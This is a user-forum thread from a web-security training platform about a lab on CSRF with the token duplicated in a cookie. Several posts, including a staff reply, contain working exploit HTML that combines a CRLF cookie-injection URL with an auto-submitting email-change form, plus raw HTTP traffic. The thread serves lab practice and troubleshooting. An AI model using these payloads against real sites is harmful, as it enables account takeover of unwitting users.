Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

CSRF LAB BROKEN - CSRF where token is duplicated in cookie

Hamza | Last updated: Jun 03, 2024 09:43AM UTC

Hey Team, When i try to deliver the exploit or test in my browser, this lab give me its invalid csrf although i have checked many times. Given is my payload. <html> <body> <h1>Hello World!</h1> <form action="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/my-account/change-email" method="post"> <input type="hidden" name="email" value="test5@test.ca"> <input type="hidden" name="csrf" value="hacked"> </form> <img src="https://0a25003904014c148065ad2c00ae00af.web-security-academy.net/?search=hat%0d%0aSet-Cookie:%20csrf=hacked%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Jun 03, 2024 10:19AM UTC

Hi Hamza, As noted in the written solution, your CSRF token needs to have the value of 'fake' in order to solve this lab. If you make this change, are you then able to solve the lab?

Hamza | Last updated: Jun 04, 2024 07:38AM UTC

It still give me invalid csrf. <html> <body> <h1>Hello World!</h1> <form action="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/my-account/change-email" method="post"> <input type="hidden" name="email" value="newtest5@test.ca"> <input type="hidden" name="csrf" value="fake"> </form> <img src="https://0a65006e0315a2d280db9958009100e4.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit()"> </body> </html>

Dominyque, PortSwigger Agent | Last updated: Jun 04, 2024 07:58AM UTC

Hi Hamza, I can confirm that the lab does solve with the given written solution. Have you changed the email address before storing and delivering the exploit to the victim? I was able to solve the lab with the following exploit: <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="testy@test.com" /> <input type="hidden" name="csrf" value="fake" /> <input type="submit" value="Submit request" /> </form> <img src="https://0a93003d0356b3b480ec9a0400340027.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake%3b%20SameSite=None" onerror="document.forms[0].submit();"/> </body> </html>

P1N | Last updated: Jun 04, 2024 03:38PM UTC

those are also incorrectly processed by my lab, my payload in search does not read properly. Everything is fine in response, but the next request does not execute. request: GET /?search=test%0d%0aSet-Cookie:%20csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg%3b%20SameSite=None HTTP/2 response: HTTP/2 200 OK Set-Cookie: LastSearchTerm=test Set-Cookie: csrfKey=idLTTRbgVUktzTkMjEnph7XH5ZkgidNg; SameSite=Non; Secure; HttpOnly Set-Cookie: session=kQbiYYVQ0pKfGQeLoFbIWROUaSHoj72m; Secure; HttpOnly; SameSite=None Next request: POST /my-account/change-email HTTP/2 Host: 0a9800f803d7e13f80da94be00c10097.web-security-academy.net Cookie: csrfKey=H5AnPN2IfpZe7bJPos8rqbUcIviDZNlz; session=4VVtwDlnyFLYMXm1voOQaGhQM5dwoav3 csrf has not changed, why?

Ben, PortSwigger Agent | Last updated: Jun 05, 2024 08:46AM UTC